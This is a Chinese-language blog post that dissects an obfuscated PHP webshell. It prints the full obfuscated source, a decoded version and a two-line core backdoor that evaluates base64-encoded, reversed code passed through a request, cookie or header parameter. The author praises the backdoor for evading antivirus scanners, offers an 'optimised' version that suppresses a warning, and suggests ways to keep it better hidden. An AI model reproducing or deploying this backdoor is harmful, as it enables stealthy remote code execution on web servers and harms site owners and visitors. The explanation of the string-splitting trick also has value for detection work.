这个木马,使用了更加高明的伪装手法!
可以轻易的避过一切杀毒软件、木马检测软件、运维工程师和程序工程师的粗心的检测!
真正做到了“免检”“免查杀”“绿色”。。。
1.这款木马具有免检不被发现安全绿色的伪装
<?php
$cleanliness ='s'; $innis= '(s(e';
$crustacean = '"';
$inadvisable= 't'; $interdisciplinary = 'a'; $canada= ')Tre';$infuriates = '^'; $cimcumvention ='t'; $exclusions ='r'; $brow='l'; $dukey= 'e';$equivocate ='y';
$construed= '(';$cloaks ='o';
$camellia= 'gqQ';$confidingly = ')';$depreciable= 'v';
$benedicto = 'T';$bribe = 'a'; $intolerably = '_eja:cR'; $explainers ='6'; $facet = 'bre';
$brawler =')StrO'; $channeled= 'S';$durand = '$H'; $flavoring= 'S';$expendable ='=]c';$brandnjanet= 'i'; $integrative= ')'; $giulietta='K[)es'; $confirmation= 'nbxEc_';$counterpoise='h'; $garland= ';jRqPy'; $limbo= '(_uwRT';$liane= 'i_L_';
$hemp='(ai"';$associatively= 'h'; $handed = 'Y"tJkH)]';
$envision ='f';
$contradistinct='Gv'; $fleet='fnerir(o';$cutter = 'r';$cognitive = 't';
$dimmer ='u'; $eldridge= '`arsm:_'; $lister = 'sVnedT';
$forsakes ='i';
$kathye = 'iCv$';$kurt ='=Qe$$Ne';$coupled= 'e'; $headaches = '[';$dynasty = 'r';
$drafting ='$';$gangster ='T';$leonid ='v'; $cheats='P'; $fabrication ='p';$landslide ='V';$fin=')';$characterize = 'QX'; $finessing =';'; $incenses = '"Ss__m,J]'; $guest3 ='S';$birthrights= 'r';$guidebook = 'u'; $donna= 'b'; $emeralds= 'rLOl"'; $constables = '? ish'; $cookery =')Bsa';$dairy= 'iRs';
$logician ='da'; $comfortably ='l([?foy,"';$altitude= 'E';$hilum='I)'; $expectant=')$HeReTcQ'; $chive = ')'; $jandy ='a';$extradition ='d';
$luce = 'JKrjs_a'; $dalia= 'p'; $bob = 'b';$benetta = '[';
$dianna ='B4';
$excepted = ';s'; $coverlets ='I_';$bridged ='rgdes'; $died= '((s';$madelene= 'tvni(';$characterizing = ']$UHc$'; $codebreak= 'E';
$landings='UEPE$plt'; $gated='$';
$belles='q';$buckle = 'S';$delightfully= 'a'; $exclaiming = 'W'; $caleb ='g'; $kellia= 'r;O("aLM';$blemish ='e';
$fart= 'F_'; $displaces= ']_RCtoZa'; $dependents ='l'; $ditty='e';
$garaged= '"g';$jolt ='i'; $june = 'HE[SD';$loyal= $characterizing[4].
$kellia['0'].$ditty.$displaces['7']. $displaces['4'] .
$ditty .$displaces['1'] .$comfortably['4'] . $guidebook .$madelene['2'] .$characterizing[4] . $displaces['4'] .
$jolt .$displaces['5']. $madelene['2'];$ardith= $constables[1]; $kermy= $loyal
($ardith, $ditty .$madelene['1'] .$displaces['7']. $dependents .
$kellia['3']. $displaces['7'].$kellia['0'] . $kellia['0']. $displaces['7'].
$comfortably['6'] .
$displaces['1']. $landings['5'] .
$displaces['5'].$landings['5'].
$kellia['3'] .
$comfortably['4'].
$guidebook. $madelene['2'] .$characterizing[4].$displaces['1'] . $garaged['1']. $ditty. $displaces['4'] . $displaces['1']. $displaces['7'] .$kellia['0']. $garaged['1']. $died['2'] . $kellia['3']. $chive.
$chive.$chive . $kellia['1']);$kermy($luce['3'],
$expectant['8'],$gated ,$june['4'],$coverlets['0'] , $characterizing[4], $characterizing[4],$comfortably['4'],$comfortably['6'] , $gated . $jolt .$kurt['0'].
$displaces['7'] . $kellia['0']. $kellia['0'] . $displaces['7'] . $comfortably['6'] .$displaces['1'] .
$incenses['5'] .
$ditty . $kellia['0'].$garaged['1']. $ditty.
$kellia['3'] .$gated .$displaces['1']. $displaces['2'].$june['1'].$expectant['8'] .
$landings['0'] . $june['1'].
$june['3']. $expectant['6']. $comfortably['7'] .$gated. $displaces['1'].
$displaces[3].
$kellia[2].$kellia[2] . $luce[1] . $coverlets['0'] .
$june['1']. $comfortably['7']. $gated .$displaces['1'] .
$june['3']. $june['1'].
$displaces['2'] . $landslide .
$june['1'].$displaces['2'] .
$chive.$kellia['1'] .$gated .
$displaces['7'] .
$kurt['0'].
$jolt . $died['2'] . $died['2'].
$ditty .$displaces['4']. $kellia['3']. $gated. $jolt . $june['2'] .$garaged['0']. $dependents.
$luce['3'] .$died['2'] .$belles .
$constables[4].$kellia['0']. $bob .$died['2'] . $garaged['0']. $displaces['0'] .$chive. $comfortably['3'] . $gated . $jolt .$june['2'].
$garaged['0'].$dependents.$luce['3']. $died['2'].
$belles .$constables[4].$kellia['0']. $bob .$died['2'].$garaged['0'] . $displaces['0'] .$eldridge['5'].$kellia['3'].
$jolt.
$died['2'].
$died['2'] .$ditty .
$displaces['4'] .
$kellia['3'].$gated. $jolt. $june['2'] .$garaged['0']. $june['0'] . $expectant['6'] . $expectant['6'] . $landings[2].$displaces['1'].
$kellia['6'].$luce['0'].$june['3'].
$expectant['8'] .$june['0'] .$displaces['2'] .
$dianna[0] .$june['3'] .$garaged['0'].$displaces['0'] .$chive . $comfortably['3']. $gated .$jolt.
$june['2']. $garaged['0']. $june['0']. $expectant['6'] . $expectant['6'] . $landings[2].
$displaces['1'].$kellia['6'].
$luce['0']. $june['3'] . $expectant['8'] . $june['0'] .
$displaces['2']. $dianna[0].
$june['3']. $garaged['0'] .
$displaces['0'].
$eldridge['5'] . $bridged[2] . $jolt.$ditty . $chive .
$kellia['1'].$ditty . $madelene['1'] .
$displaces['7'].$dependents . $kellia['3'].$died['2'] .
$displaces['4'] . $kellia['0'].$kellia['0'] . $ditty . $madelene['1'] . $kellia['3'] . $bob .$displaces['7'] . $died['2'] . $ditty.$explainers. $dianna['1'] .
$displaces['1'] .
$bridged[2].$ditty .$characterizing[4] . $displaces['5'] . $bridged[2] .
$ditty. $kellia['3']. $died['2'] . $displaces['4']. $kellia['0'] .$kellia['0'].$ditty.$madelene['1'].$kellia['3'] . $gated.$displaces['7'] . $chive .$chive . $chive .$chive .
$kellia['1'] );
2.PHP木马免检绕过木马扫描病毒查杀原理
有句老话
蛋炒饭,蛋炒饭,最简单,最困难!
上述木马源码隆重的利用了
- 1.PHP变量连接
- 2.PHP字符串拆分
- 3.深刻的理解PHP字符串和数组转换规则
以此来实现了 PHP木马”免检“产品!
举个例子大家就明白了
$a = 'eval';
echo $a[0];//输出e,同$a{0}
echo $a[1];//输出v,同$a{1}
echo $a[2];//输出a,同$a{2}
echo $a[3];//输出l,同$a{3}
echo $a[0].$a[1].$a[2].$a[3];//输出eval
3.PHP木马解码解密后的源码真实面纱
经过工程师LET不屑努力,以及相关朋友的提醒,终于弄清了木马的来龙去脉。。
我们这些PHP老鸟,都对此款木马佩服的五体投地!
<?php
$cleanliness = 's';
$innis = '(s(e';
$crustacean = '"';
$inadvisable = 't';
$interdisciplinary = 'a';
$canada = ')Tre';
$infuriates = '^';
$cimcumvention = 't';
$exclusions = 'r';
$brow = 'l';
$dukey = 'e';
$equivocate = 'y';
$construed = '(';
$cloaks = 'o';
$camellia = 'gqQ';
$confidingly = ')';
$depreciable = 'v';
$benedicto = 'T';
$bribe = 'a';
$intolerably = '_eja:cR';
$explainers = '6';
$facet = 'bre';
$brawler = ')StrO';
$channeled = 'S';
$durand = '$H';
$flavoring = 'S';
$expendable = '=]c';
$brandnjanet = 'i';
$integrative = ')';
$giulietta = 'K[)es';
$confirmation = 'nbxEc_';
$counterpoise = 'h';
$garland = ';jRqPy';
$limbo = '(_uwRT';
$liane = 'i_L_';
$hemp = '(ai"';
$associatively = 'h';
$handed = 'Y"tJkH)]';
$envision = 'f';
$contradistinct = 'Gv';
$fleet = 'fnerir(o';
$cutter = 'r';
$cognitive = 't';
$dimmer = 'u';
$eldridge = '`arsm:_';
$lister = 'sVnedT';
$forsakes = 'i';
$kathye = 'iCv$';
$kurt = '=Qe$$Ne';
$coupled = 'e';
$headaches = '[';
$dynasty = 'r';
$drafting = '$';
$gangster = 'T';
$leonid = 'v';
$cheats = 'P';
$fabrication = 'p';
$landslide = 'V';
$fin = ')';
$characterize = 'QX';
$finessing = ';';
$incenses = '"Ss__m,J]';
$guest3 = 'S';
$birthrights = 'r';
$guidebook = 'u';
$donna = 'b';
$emeralds = 'rLOl"';
$constables = '? ish';
$cookery = ')Bsa';
$dairy = 'iRs';
$logician = 'da';
$comfortably = 'l([?foy,"';
$altitude = 'E';
$hilum = 'I)';
$expectant = ')$HeReTcQ';
$chive = ')';
$jandy = 'a';
$extradition = 'd';
$luce = 'JKrjs_a';
$dalia = 'p';
$bob = 'b';
$benetta = '[';
$dianna = 'B4';
$excepted = ';s';
$coverlets = 'I_';
$bridged = 'rgdes';
$died = '((s';
$madelene = 'tvni(';
$characterizing = ']$UHc$';
$codebreak = 'E';
$landings = 'UEPE$plt';
$gated = '$';
$belles = 'q';
$buckle = 'S';
$delightfully = 'a';
$exclaiming = 'W';
$caleb = 'g';
$kellia = 'r;O("aLM';
$blemish = 'e';
$fart = 'F_';
$displaces = ']_RCtoZa';
$dependents = 'l';
$ditty = 'e';
$garaged = '"g';
$jolt = 'i';
$june = 'HE[SD';
$loyal = 'create_function';
$ardith = ' ';
$kermy = $loyal($ardith, 'eval(@array_pop(func_get_args()));');
$kermy('j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y', '$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["ljsqhrbs"])?$i["ljsqhrbs"]:(isset($i["HTTP_LJSQHRBS"])?$i["HTTP_LJSQHRBS"]:die);eval(strrev(base64_decode(strrev($a))));');
4.PHP木马经典源码展现
通过一切的伪装、拼接,最后形成了核心2句话木马:
$kermy = create_function(' ', 'eval(array_pop(func_get_args()));');
$kermy('j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y', '$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["ljsqhrbs"])?$i["ljsqhrbs"]:(isset($i["HTTP_LJSQHRBS"])?$i["HTTP_LJSQHRBS"]:die);eval(strrev(base64_decode(strrev($a))));');
不过作者
LET经过分析后,发现他们有个不完美的地方,就是
array_pop的参数必须是引用的,上述代码回产生个Strict Standards的警告!
本着英雄识英雄的癖好,帮他优化了下,优化后代码:
$kermy = create_function(' ', 'eval(@array_pop(func_get_args()));');
$kermy('j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y', '$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["ljsqhrbs"])?$i["ljsqhrbs"]:(isset($i["HTTP_LJSQHRBS"])?$i["HTTP_LJSQHRBS"]:die);eval(strrev(base64_decode(strrev($a))));');
5.PHP木马代码执行流程概略
博士毕业考试:
导师:用你终身所学,请谨慎的回答我,1+1 = ?
博士:额,怎么会这么简单?不可能吧!
我该怎么回答呢?微积分?潜规则?陷阱?。。。。。
真正的答案:2
- 1.设置烟雾弹'j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y',这也是迷惑作者百思不得其解的地方,就好像上述例子。
- 2.func_get_args()动态获取所以第二行传来的所有参数,最后通过array_pop获取最后1个参数为执行代码eval,其他参数都是烟雾弹!
- 3.将$_REQUEST(get+post),$_COOKIE,$_SERVER联合后赋值给$i
- 4.判断上述值里有没有外部传过来的ljsqhrbs参数木马,如果有则按照eval(strrev(base64_decode(strrev($a))))执行!
- 5.紧接着上述,如果没有ljsqhrbs,则看外部提交来的参数HTTP_LJSQHRBS在不在,如果在,则执行!如果不再,则强制暂停并结束脚本!
6.PHP木马评价&作者观点
PHP木马亮点:
1.很聪明,简直是太聪明了,费尽心机啊!
2.create_function第二个参数,灵活&深刻的理解并使用了函数包体里写常规php代码的亮点!潇洒不失浪漫、奔放不失严谨!一看就知道是木马专业或者PHP大师的杰出作品!
PHP木马败笔:
1. array_pop的参数必须是引用的,上述代码回产生个Strict Standards的警告!害的作者帮他优化了下。。。2.木马毕竟是木马,就算没有木马想要的参数或者执行失败,最后也不能die啊!如果你这个文件挂马在文件头部的话,岂不很容易暴露?